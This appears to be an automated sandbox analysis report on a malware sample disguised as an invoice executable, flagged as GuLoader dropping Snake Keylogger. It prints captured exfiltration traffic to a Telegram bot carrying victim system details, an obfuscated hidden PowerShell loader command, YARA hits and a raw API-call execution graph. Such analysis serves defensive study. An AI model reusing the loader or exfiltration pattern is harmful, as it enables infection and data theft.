Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUm%2FQwUfUQfHUkcqFNHvVs4xlx2zaG37q0HPQNA8j4k3sy9%2BM4Icf0Zt7jk7X1RQUbqWAek3W5jtTis155UY5ZtKw5kbNlmIRgLTzNw%2FuRmhcO80nXv1%2B%2F8G%2BRNd9DYVhfMehyGE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d792304095e464e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2445945&cwnd=251&unsent_bytes=0&cid=0deac994d4926cd6&ts=153&x=0"
Timestamp: 2024-10-24 10:03:24 UTC | Bytes transferred: 366 | Direction: IN
Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.22 | 49181 | 149.154.167.220 | 443 | 2504 | C:\Windows\SysWOW64\msiexec.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 10:03:25 UTC | 353 bytes | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-24 10:03:25 UTC | 344 bytes | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 24 Oct 2024 10:03:25 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-24 10:03:25 UTC | 55 bytes | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 06:01:48
Start date: 24/10/2024
Path: C:\Users\user\Desktop\REVISED INVOICE.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\REVISED INVOICE.exe"
Imagebase: 0x400000
File size: 1'007'528 bytes
MD5 hash: 8274B1A41B53BF35E0B4330A20010D4C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 3
Start time: 06:01:56
Start date: 24/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
Imagebase: 0x10c0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 5
Start time: 06:02:46
Start date: 24/10/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\msiexec.exe"
Imagebase: 0x8b0000
File size: 73'216 bytes
MD5 hash: 4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: false


Execution Graph

Execution Coverage: 23.5%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 22.4%
Total number of Nodes: 1341
Total number of Limit Nodes: 46
4239->4241 4242 402a4c 4239->4242 4240->4239 4241->4242 4250 40226e 4251 402275 4250->4251 4254 402288 4250->4254 4252 406041 19 API calls 4251->4252 4253 402282 4252->4253 4255 405764 MessageBoxIndirectW 4253->4255 4255->4254 4256 4014f1 SetForegroundWindow 4257 402a4c 4256->4257 3788 4050f2 3789 405102 3788->3789 3790 405116 3788->3790 3792 405108 3789->3792 3801 40515f 3789->3801 3791 40511e IsWindowVisible 3790->3791 3798 40513e 3790->3798 3794 40512b 3791->3794 3791->3801 3793 40412f SendMessageW 3792->3793 3796 405112 3793->3796 3802 404a48 SendMessageW 3794->3802 3795 405164 CallWindowProcW 3795->3796 3798->3795 3807 404ac8 3798->3807 3801->3795 3803 404aa7 SendMessageW 3802->3803 3804 404a6b GetMessagePos ScreenToClient SendMessageW 3802->3804 3806 404a9f 3803->3806 3805 404aa4 3804->3805 3804->3806 3805->3803 3806->3798 3816 40601f lstrcpynW 3807->3816 3809 404adb 3817 405f66 wsprintfW 3809->3817 3811 404ae5 3812 40140b 2 API calls 3811->3812 3813 404aee 3812->3813 3818 40601f lstrcpynW 3813->3818 3815 404af5 3815->3801 3816->3809 3817->3811 3818->3815 4258 401673 4259 402bbf 19 API calls 4258->4259 4260 40167a 4259->4260 4261 402bbf 19 API calls 4260->4261 4262 401683 4261->4262 4263 402bbf 19 API calls 4262->4263 4264 40168c MoveFileW 4263->4264 4265 401698 4264->4265 4266 40169f 4264->4266 4267 401423 26 API calls 4265->4267 4268 406362 2 API calls 4266->4268 4270 4021e1 4266->4270 4267->4270 4269 4016ae 4268->4269 4269->4270 4271 405ec0 39 API calls 4269->4271 4271->4265 4272 4041f7 lstrcpynW lstrlenW 3870 404afa GetDlgItem GetDlgItem 3871 404b4c 7 API calls 3870->3871 3874 404d65 3870->3874 3872 404be2 SendMessageW 3871->3872 3873 404bef DeleteObject 3871->3873 3872->3873 3875 404bf8 3873->3875 3877 404e49 3874->3877 3880 404e2a 3874->3880 3886 404dc5 3874->3886 3876 404c2f 3875->3876 3878 404c07 3875->3878 3881 4040e3 20 API calls 3876->3881 3882 404ef5 3877->3882 3888 4050dd 3877->3888 3893 404ea2 SendMessageW 3877->3893 3879 406041 19 API calls 
3878->3879 3883 404c11 SendMessageW SendMessageW 3879->3883 3880->3877 3890 404e3b SendMessageW 3880->3890 3887 404c43 3881->3887 3884 404f07 3882->3884 3885 404eff SendMessageW 3882->3885 3883->3875 3895 404f20 3884->3895 3896 404f19 ImageList_Destroy 3884->3896 3903 404f30 3884->3903 3885->3884 3891 404a48 5 API calls 3886->3891 3892 4040e3 20 API calls 3887->3892 3889 40414a 8 API calls 3888->3889 3894 4050eb 3889->3894 3890->3877 3907 404dd6 3891->3907 3908 404c51 3892->3908 3893->3888 3898 404eb7 SendMessageW 3893->3898 3899 404f29 GlobalFree 3895->3899 3895->3903 3896->3895 3897 40509f 3897->3888 3904 4050b1 ShowWindow GetDlgItem ShowWindow 3897->3904 3901 404eca 3898->3901 3899->3903 3900 404d26 GetWindowLongW SetWindowLongW 3902 404d3f 3900->3902 3909 404edb SendMessageW 3901->3909 3905 404d45 ShowWindow 3902->3905 3906 404d5d 3902->3906 3903->3897 3914 404ac8 4 API calls 3903->3914 3921 404f6b 3903->3921 3904->3888 3925 404118 SendMessageW 3905->3925 3926 404118 SendMessageW 3906->3926 3907->3880 3908->3900 3910 404d20 3908->3910 3913 404ca1 SendMessageW 3908->3913 3916 404cdd SendMessageW 3908->3916 3917 404cee SendMessageW 3908->3917 3909->3882 3910->3900 3910->3902 3913->3908 3914->3921 3915 404d58 3915->3888 3916->3908 3917->3908 3918 405075 InvalidateRect 3918->3897 3919 40508b 3918->3919 3927 404a03 3919->3927 3920 404f99 SendMessageW 3924 404faf 3920->3924 3921->3920 3921->3924 3923 405023 SendMessageW SendMessageW 3923->3924 3924->3918 3924->3923 3925->3915 3926->3874 3930 40493a 3927->3930 3929 404a18 3929->3897 3931 404953 3930->3931 3932 406041 19 API calls 3931->3932 3933 4049b7 3932->3933 3934 406041 19 API calls 3933->3934 3935 4049c2 3934->3935 3936 406041 19 API calls 3935->3936 3937 4049d8 lstrlenW wsprintfW SetDlgItemTextW 3936->3937 3937->3929 4273 401cfa GetDlgItem GetClientRect 4274 402bbf 19 API calls 4273->4274 4275 401d2c LoadImageW SendMessageW 4274->4275 4276 401d4a DeleteObject 4275->4276 4277 402a4c 4275->4277 4276->4277 3938 
4027fb 3939 402bbf 19 API calls 3938->3939 3940 402802 FindFirstFileW 3939->3940 3941 40282a 3940->3941 3945 402815 3940->3945 3942 402833 3941->3942 3946 405f66 wsprintfW 3941->3946 3947 40601f lstrcpynW 3942->3947 3946->3942 3947->3945 3948 40237b 3949 402381 3948->3949 3950 402bbf 19 API calls 3949->3950 3951 402393 3950->3951 3952 402bbf 19 API calls 3951->3952 3953 40239d RegCreateKeyExW 3952->3953 3954 4023c7 3953->3954 3955 402a4c 3953->3955 3956 4023e2 3954->3956 3957 402bbf 19 API calls 3954->3957 3958 4023ee 3956->3958 3960 402ba2 19 API calls 3956->3960 3959 4023d8 lstrlenW 3957->3959 3961 402409 RegSetValueExW 3958->3961 3962 403027 37 API calls 3958->3962 3959->3956 3960->3958 3963 40241f RegCloseKey 3961->3963 3962->3961 3963->3955 4278 40457e 4279 4045aa 4278->4279 4280 4045bb 4278->4280 4339 405748 GetDlgItemTextW 4279->4339 4282 4045c7 GetDlgItem 4280->4282 4284 404626 4280->4284 4283 4045db 4282->4283 4288 4045ef SetWindowTextW 4283->4288 4291 405a7e 4 API calls 4283->4291 4285 40470a 4284->4285 4293 406041 19 API calls 4284->4293 4337 4048b9 4284->4337 4285->4337 4341 405748 GetDlgItemTextW 4285->4341 4286 4045b5 4287 4062b3 5 API calls 4286->4287 4287->4280 4292 4040e3 20 API calls 4288->4292 4290 40414a 8 API calls 4295 4048cd 4290->4295 4296 4045e5 4291->4296 4297 40460b 4292->4297 4298 40469a SHBrowseForFolderW 4293->4298 4294 40473a 4299 405adb 18 API calls 4294->4299 4296->4288 4303 4059d3 3 API calls 4296->4303 4300 4040e3 20 API calls 4297->4300 4298->4285 4301 4046b2 CoTaskMemFree 4298->4301 4302 404740 4299->4302 4304 404619 4300->4304 4305 4059d3 3 API calls 4301->4305 4342 40601f lstrcpynW 4302->4342 4303->4288 4340 404118 SendMessageW 4304->4340 4307 4046bf 4305->4307 4310 4046f6 SetDlgItemTextW 4307->4310 4314 406041 19 API calls 4307->4314 4309 40461f 4312 4063f5 5 API calls 4309->4312 4310->4285 4311 404757 4313 4063f5 5 API calls 4311->4313 4312->4284 4320 40475e 4313->4320 4315 4046de lstrcmpiW 4314->4315 4315->4310 4317 4046ef 
lstrcatW 4315->4317 4316 40479f 4343 40601f lstrcpynW 4316->4343 4317->4310 4319 4047a6 4321 405a7e 4 API calls 4319->4321 4320->4316 4325 405a1f 2 API calls 4320->4325 4326 4047f7 4320->4326 4322 4047ac GetDiskFreeSpaceW 4321->4322 4324 4047d0 MulDiv 4322->4324 4322->4326 4324->4326 4325->4320 4327 404868 4326->4327 4329 404a03 22 API calls 4326->4329 4328 40488b 4327->4328 4330 40140b 2 API calls 4327->4330 4344 404105 EnableWindow 4328->4344 4331 404855 4329->4331 4330->4328 4333 40486a SetDlgItemTextW 4331->4333 4334 40485a 4331->4334 4333->4327 4335 40493a 22 API calls 4334->4335 4335->4327 4336 4048a7 4336->4337 4345 404513 4336->4345 4337->4290 4339->4286 4340->4309 4341->4294 4342->4311 4343->4319 4344->4336 4346 404521 4345->4346 4347 404526 SendMessageW 4345->4347 4346->4347 4347->4337 4348 4014ff 4349 401507 4348->4349 4351 40151a 4348->4351 4350 402ba2 19 API calls 4349->4350 4350->4351 4352 401000 4353 401037 BeginPaint GetClientRect 4352->4353 4354 40100c DefWindowProcW 4352->4354 4356 4010f3 4353->4356 4357 401179 4354->4357 4358 401073 CreateBrushIndirect FillRect DeleteObject 4356->4358 4359 4010fc 4356->4359 4358->4356 4360 401102 CreateFontIndirectW 4359->4360 4361 401167 EndPaint 4359->4361 4360->4361 4362 401112 6 API calls 4360->4362 4361->4357 4362->4361 4363 404280 4364 404298 4363->4364 4365 4043b2 4363->4365 4371 4040e3 20 API calls 4364->4371 4366 40441c 4365->4366 4368 4044ee 4365->4368 4374 4043ed GetDlgItem SendMessageW 4365->4374 4367 404426 GetDlgItem 4366->4367 4366->4368 4369 404440 4367->4369 4370 4044af 4367->4370 4373 40414a 8 API calls 4368->4373 4369->4370 4376 404466 6 API calls 4369->4376 4370->4368 4377 4044c1 4370->4377 4372 4042ff 4371->4372 4375 4040e3 20 API calls 4372->4375 4385 4044e9 4373->4385 4394 404105 EnableWindow 4374->4394 4379 40430c CheckDlgButton 4375->4379 4376->4370 4380 4044d7 4377->4380 4381 4044c7 SendMessageW 4377->4381 4392 404105 EnableWindow 4379->4392 4380->4385 4386 4044dd SendMessageW 4380->4386 
4381->4380 4382 404417 4383 404513 SendMessageW 4382->4383 4383->4366 4386->4385 4387 40432a GetDlgItem 4393 404118 SendMessageW 4387->4393 4389 404340 SendMessageW 4390 404366 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4389->4390 4391 40435d GetSysColor 4389->4391 4390->4385 4391->4390 4392->4387 4393->4389 4394->4382 4402 401904 4403 40193b 4402->4403 4404 402bbf 19 API calls 4403->4404 4405 401940 4404->4405 4406 405810 70 API calls 4405->4406 4407 401949 4406->4407 4408 402d04 4409 402d16 SetTimer 4408->4409 4410 402d2f 4408->4410 4409->4410 4411 402d84 4410->4411 4412 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4412 4412->4411 4413 402786 4414 4029f7 4413->4414 4415 40278d 4413->4415 4416 402ba2 19 API calls 4415->4416 4417 402798 4416->4417 4418 40279f SetFilePointer 4417->4418 4418->4414 4419 4027af 4418->4419 4421 405f66 wsprintfW 4419->4421 4421->4414 4422 401907 4423 402bbf 19 API calls 4422->4423 4424 40190e 4423->4424 4425 405764 MessageBoxIndirectW 4424->4425 4426 401917 4425->4426 3282 401e08 3283 402bbf 19 API calls 3282->3283 3284 401e0e 3283->3284 3285 402bbf 19 API calls 3284->3285 3286 401e17 3285->3286 3287 402bbf 19 API calls 3286->3287 3288 401e20 3287->3288 3289 402bbf 19 API calls 3288->3289 3290 401e29 3289->3290 3291 401423 26 API calls 3290->3291 3292 401e30 ShellExecuteW 3291->3292 3293 401e61 3292->3293 3694 403c0b 3695 403c23 3694->3695 3696 403d5e 3694->3696 3695->3696 3697 403c2f 3695->3697 3698 403daf 3696->3698 3699 403d6f GetDlgItem GetDlgItem 3696->3699 3700 403c3a SetWindowPos 3697->3700 3701 403c4d 3697->3701 3703 403e09 3698->3703 3711 401389 2 API calls 3698->3711 3702 4040e3 20 API calls 3699->3702 3700->3701 3705 403c52 ShowWindow 3701->3705 3706 403c6a 3701->3706 3707 403d99 SetClassLongW 3702->3707 3704 40412f SendMessageW 3703->3704 3725 403d59 3703->3725 3734 403e1b 3704->3734 3705->3706 3708 403c72 DestroyWindow 3706->3708 3709 403c8c 3706->3709 3710 40140b 2 API calls 3707->3710 3713 
40408d 3708->3713 3714 403c91 SetWindowLongW 3709->3714 3715 403ca2 3709->3715 3710->3698 3712 403de1 3711->3712 3712->3703 3716 403de5 SendMessageW 3712->3716 3722 40409d ShowWindow 3713->3722 3713->3725 3714->3725 3719 403d4b 3715->3719 3720 403cae GetDlgItem 3715->3720 3716->3725 3717 40140b 2 API calls 3717->3734 3718 40406e DestroyWindow EndDialog 3718->3713 3774 40414a 3719->3774 3723 403cc1 SendMessageW IsWindowEnabled 3720->3723 3724 403cde 3720->3724 3722->3725 3723->3724 3723->3725 3727 403ceb 3724->3727 3728 403d32 SendMessageW 3724->3728 3729 403cfe 3724->3729 3739 403ce3 3724->3739 3726 406041 19 API calls 3726->3734 3727->3728 3727->3739 3728->3719 3731 403d06 3729->3731 3732 403d1b 3729->3732 3735 40140b 2 API calls 3731->3735 3736 40140b 2 API calls 3732->3736 3733 403d19 3733->3719 3734->3717 3734->3718 3734->3725 3734->3726 3737 4040e3 20 API calls 3734->3737 3755 403fae DestroyWindow 3734->3755 3765 4040e3 3734->3765 3735->3739 3738 403d22 3736->3738 3737->3734 3738->3719 3738->3739 3771 4040bc 3739->3771 3741 403e96 GetDlgItem 3742 403eb3 ShowWindow KiUserCallbackDispatcher 3741->3742 3743 403eab 3741->3743 3768 404105 EnableWindow 3742->3768 3743->3742 3745 403edd EnableWindow 3749 403ef1 3745->3749 3746 403ef6 GetSystemMenu EnableMenuItem SendMessageW 3747 403f26 SendMessageW 3746->3747 3746->3749 3747->3749 3749->3746 3769 404118 SendMessageW 3749->3769 3770 40601f lstrcpynW 3749->3770 3751 403f54 lstrlenW 3752 406041 19 API calls 3751->3752 3753 403f6a SetWindowTextW 3752->3753 3754 401389 2 API calls 3753->3754 3754->3734 3755->3713 3756 403fc8 CreateDialogParamW 3755->3756 3756->3713 3757 403ffb 3756->3757 3758 4040e3 20 API calls 3757->3758 3759 404006 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3758->3759 3760 401389 2 API calls 3759->3760 3761 40404c 3760->3761 3761->3725 3762 404054 ShowWindow 3761->3762 3763 40412f SendMessageW 3762->3763 3764 40406c 3763->3764 3764->3713 3766 406041 19 API calls 3765->3766 3767 4040ee 
SetDlgItemTextW 3766->3767 3767->3741 3768->3745 3769->3749 3770->3751 3772 4040c3 3771->3772 3773 4040c9 SendMessageW 3771->3773 3772->3773 3773->3733 3775 404162 GetWindowLongW 3774->3775 3785 4041eb 3774->3785 3776 404173 3775->3776 3775->3785 3777 404182 GetSysColor 3776->3777 3778 404185 3776->3778 3777->3778 3779 404195 SetBkMode 3778->3779 3780 40418b SetTextColor 3778->3780 3781 4041b3 3779->3781 3782 4041ad GetSysColor 3779->3782 3780->3779 3783 4041c4 3781->3783 3784 4041ba SetBkColor 3781->3784 3782->3781 3783->3785 3786 4041d7 DeleteObject 3783->3786 3787 4041de CreateBrushIndirect 3783->3787 3784->3783 3785->3725 3786->3787 3787->3785 4432 401491 4433 40517e 26 API calls 4432->4433 4434 401498 4433->4434 3819 402095 3820 402bbf 19 API calls 3819->3820 3821 40209c 3820->3821 3822 402bbf 19 API calls 3821->3822 3823 4020a6 3822->3823 3824 402bbf 19 API calls 3823->3824 3825 4020b0 3824->3825 3826 402bbf 19 API calls 3825->3826 3827 4020ba 3826->3827 3828 402bbf 19 API calls 3827->3828 3830 4020c4 3828->3830 3829 402103 CoCreateInstance 3834 402122 3829->3834 3830->3829 3831 402bbf 19 API calls 3830->3831 3831->3829 3832 401423 26 API calls 3833 4021e1 3832->3833 3834->3832 3834->3833 4435 401a15 4436 402bbf 19 API calls 4435->4436 4437 401a1e ExpandEnvironmentStringsW 4436->4437 4438 401a32 4437->4438 4439 401a45 4437->4439 4438->4439 4440 401a37 lstrcmpW 4438->4440 4440->4439 4441 402515 4442 402bbf 19 API calls 4441->4442 4443 40251c 4442->4443 4446 405bf4 GetFileAttributesW CreateFileW 4443->4446 4445 402528 4446->4445 4447 401b16 4448 402bbf 19 API calls 4447->4448 4449 401b1d 4448->4449 4450 402ba2 19 API calls 4449->4450 4451 401b26 wsprintfW 4450->4451 4452 402a4c 4451->4452 4453 406b18 4454 406567 4453->4454 4454->4454 4455 4065f1 GlobalAlloc 4454->4455 4456 4065e8 GlobalFree 4454->4456 4457 406ed2 4454->4457 4458 406668 GlobalAlloc 4454->4458 4459 40665f GlobalFree 4454->4459 4455->4454 4455->4457 4456->4455 4458->4454 4458->4457 4459->4458 3965 
40159b 3966 402bbf 19 API calls 3965->3966 3967 4015a2 SetFileAttributesW 3966->3967 3968 4015b4 3967->3968 3977 40229d 3978 4022a5 3977->3978 3980 4022ab 3977->3980 3979 402bbf 19 API calls 3978->3979 3979->3980 3981 402bbf 19 API calls 3980->3981 3982 4022b9 3980->3982 3981->3982 3983 4022c7 3982->3983 3985 402bbf 19 API calls 3982->3985 3984 402bbf 19 API calls 3983->3984 3986 4022d0 WritePrivateProfileStringW 3984->3986 3985->3983 4467 401f1d 4468 402bbf 19 API calls 4467->4468 4469 401f24 4468->4469 4470 4063f5 5 API calls 4469->4470 4471 401f33 4470->4471 4472 401f4f GlobalAlloc 4471->4472 4481 401fb7 4471->4481 4473 401f63 4472->4473 4472->4481 4474 4063f5 5 API calls 4473->4474 4475 401f6a 4474->4475 4476 4063f5 5 API calls 4475->4476 4477 401f74 4476->4477 4477->4481 4482 405f66 wsprintfW 4477->4482 4479 401fa9 4483 405f66 wsprintfW 4479->4483 4482->4479 4483->4481 4484 40149e 4485 402288 4484->4485 4486 4014ac PostQuitMessage 4484->4486 4486->4485 4487 40249e 4488 402cc9 20 API calls 4487->4488 4489 4024a8 4488->4489 4490 402ba2 19 API calls 4489->4490 4491 4024b1 4490->4491 4492 4024d5 RegEnumValueW 4491->4492 4493 4024c9 RegEnumKeyW 4491->4493 4495 40281e 4491->4495 4494 4024ee RegCloseKey 4492->4494 4492->4495 4493->4494 4494->4495 4009 40231f 4010 402324 4009->4010 4011 40234f 4009->4011 4012 402cc9 20 API calls 4010->4012 4013 402bbf 19 API calls 4011->4013 4014 40232b 4012->4014 4015 402356 4013->4015 4016 402335 4014->4016 4020 40236c 4014->4020 4021 402bff RegOpenKeyExW 4015->4021 4017 402bbf 19 API calls 4016->4017 4018 40233c RegDeleteValueW RegCloseKey 4017->4018 4018->4020 4022 402c93 4021->4022 4028 402c2a 4021->4028 4022->4020 4023 402c50 RegEnumKeyW 4024 402c62 RegCloseKey 4023->4024 4023->4028 4026 4063f5 5 API calls 4024->4026 4025 402c87 RegCloseKey 4031 402c76 4025->4031 4029 402c72 4026->4029 4027 402bff 5 API calls 4027->4028 4028->4023 4028->4024 4028->4025 4028->4027 4030 402ca2 RegDeleteKeyW 4029->4030 4029->4031 4030->4031 
4031->4022 4504 401ca3 4505 402ba2 19 API calls 4504->4505 4506 401ca9 IsWindow 4505->4506 4507 401a05 4506->4507 4508 403826 4509 403831 4508->4509 4510 403835 4509->4510 4511 403838 GlobalAlloc 4509->4511 4511->4510 4512 402a27 SendMessageW 4513 402a41 InvalidateRect 4512->4513 4514 402a4c 4512->4514 4513->4514 3678 40242a 3689 402cc9 3678->3689 3680 402434 3681 402bbf 19 API calls 3680->3681 3682 40243d 3681->3682 3683 402448 RegQueryValueExW 3682->3683 3688 40281e 3682->3688 3684 40246e RegCloseKey 3683->3684 3685 402468 3683->3685 3684->3688 3685->3684 3693 405f66 wsprintfW 3685->3693 3690 402bbf 19 API calls 3689->3690 3691 402ce2 3690->3691 3692 402cf0 RegOpenKeyExW 3691->3692 3692->3680 3693->3684 4515 40172d 4516 402bbf 19 API calls 4515->4516 4517 401734 SearchPathW 4516->4517 4518 40174f 4517->4518 4526 404231 lstrlenW 4527 404250 4526->4527 4528 404252 WideCharToMultiByte 4526->4528 4527->4528 4529 4027b4 4530 4027ba 4529->4530 4531 4027c2 FindClose 4530->4531 4532 402a4c 4530->4532 4531->4532 4533 404537 4534 404547 4533->4534 4535 40456d 4533->4535 4537 4040e3 20 API calls 4534->4537 4536 40414a 8 API calls 4535->4536 4538 404579 4536->4538 4539 404554 SetDlgItemTextW 4537->4539 4539->4535 4540 401b37 4541 401b44 4540->4541 4542 401b88 4540->4542 4543 401bcd 4541->4543 4549 401b5b 4541->4549 4544 401bb2 GlobalAlloc 4542->4544 4545 401b8d 4542->4545 4547 406041 19 API calls 4543->4547 4553 402288 4543->4553 4546 406041 19 API calls 4544->4546 4545->4553 4561 40601f lstrcpynW 4545->4561 4546->4543 4548 402282 4547->4548 4555 405764 MessageBoxIndirectW 4548->4555 4559 40601f lstrcpynW 4549->4559 4551 401b9f GlobalFree 4551->4553 4554 401b6a 4560 40601f lstrcpynW 4554->4560 4555->4553 4557 401b79 4562 40601f lstrcpynW 4557->4562 4559->4554 4560->4557 4561->4551 4562->4553 4563 402537 4564 402562 4563->4564 4565 40254b 4563->4565 4567 402596 4564->4567 4568 402567 4564->4568 4566 402ba2 19 API calls 4565->4566 4574 402552 4566->4574 4569 402bbf 19 API 
calls 4567->4569 4570 402bbf 19 API calls 4568->4570 4572 40259d lstrlenW 4569->4572 4571 40256e WideCharToMultiByte lstrlenA 4570->4571 4571->4574 4572->4574 4573 4025e0 4574->4573 4576 405cd5 5 API calls 4574->4576 4577 4025ca 4574->4577 4575 405ca6 WriteFile 4575->4573 4576->4577 4577->4573 4577->4575 4578 4014b8 4579 4014be 4578->4579 4580 401389 2 API calls 4579->4580 4581 4014c6 4580->4581 3849 4015b9 3850 402bbf 19 API calls 3849->3850 3851 4015c0 3850->3851 3852 405a7e 4 API calls 3851->3852 3864 4015c9 3852->3864 3853 401629 3855 40165b 3853->3855 3856 40162e 3853->3856 3854 405a00 CharNextW 3854->3864 3858 401423 26 API calls 3855->3858 3857 401423 26 API calls 3856->3857 3859 401635 3857->3859 3867 401653 3858->3867 3869 40601f lstrcpynW 3859->3869 3861 4056ca 2 API calls 3861->3864 3862 4056e7 5 API calls 3862->3864 3863 401642 SetCurrentDirectoryW 3863->3867 3864->3853 3864->3854 3864->3861 3864->3862 3865 40160f GetFileAttributesW 3864->3865 3866 4015f2 3864->3866 3865->3864 3866->3864 3868 40564d 4 API calls 3866->3868 3868->3866 3869->3863 4582 40293b 4583 402ba2 19 API calls 4582->4583 4584 402941 4583->4584 4585 402964 4584->4585 4586 40297d 4584->4586 4593 40281e 4584->4593 4587 402969 4585->4587 4588 40297a 4585->4588 4589 402993 4586->4589 4590 402987 4586->4590 4596 40601f lstrcpynW 4587->4596 4597 405f66 wsprintfW 4588->4597 4592 406041 19 API calls 4589->4592 4591 402ba2 19 API calls 4590->4591 4591->4593 4592->4593 4596->4593 4597->4593 4598 4052bd 4599 405467 4598->4599 4600 4052de GetDlgItem GetDlgItem GetDlgItem 4598->4600 4602 405470 GetDlgItem CreateThread CloseHandle 4599->4602 4603 405498 4599->4603 4643 404118 SendMessageW 4600->4643 4602->4603 4605 4054c3 4603->4605 4606 4054e8 4603->4606 4607 4054af ShowWindow ShowWindow 4603->4607 4604 40534e 4609 405355 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4604->4609 4608 405523 4605->4608 4611 4054d7 4605->4611 4612 4054fd ShowWindow 4605->4612 4613 40414a 8 API calls 
4606->4613 4645 404118 SendMessageW 4607->4645 4608->4606 4616 405531 SendMessageW 4608->4616 4614 4053c3 4609->4614 4615 4053a7 SendMessageW SendMessageW 4609->4615 4617 4040bc SendMessageW 4611->4617 4619 40551d 4612->4619 4620 40550f 4612->4620 4618 4054f6 4613->4618 4623 4053d6 4614->4623 4624 4053c8 SendMessageW 4614->4624 4615->4614 4616->4618 4625 40554a CreatePopupMenu 4616->4625 4617->4606 4622 4040bc SendMessageW 4619->4622 4621 40517e 26 API calls 4620->4621 4621->4619 4622->4608 4627 4040e3 20 API calls 4623->4627 4624->4623 4626 406041 19 API calls 4625->4626 4628 40555a AppendMenuW 4626->4628 4629 4053e6 4627->4629 4630 405577 GetWindowRect 4628->4630 4631 40558a TrackPopupMenu 4628->4631 4632 405423 GetDlgItem SendMessageW 4629->4632 4633 4053ef ShowWindow 4629->4633 4630->4631 4631->4618 4635 4055a5 4631->4635 4632->4618 4634 40544a SendMessageW SendMessageW 4632->4634 4636 405412 4633->4636 4637 405405 ShowWindow 4633->4637 4634->4618 4638 4055c1 SendMessageW 4635->4638 4644 404118 SendMessageW 4636->4644 4637->4636 4638->4638 4639 4055de OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4638->4639 4641 405603 SendMessageW 4639->4641 4641->4641 4642 40562c GlobalUnlock SetClipboardData CloseClipboard 4641->4642 4642->4618 4643->4604 4644->4632 4645->4605

                                                                                                Control-flow Graph
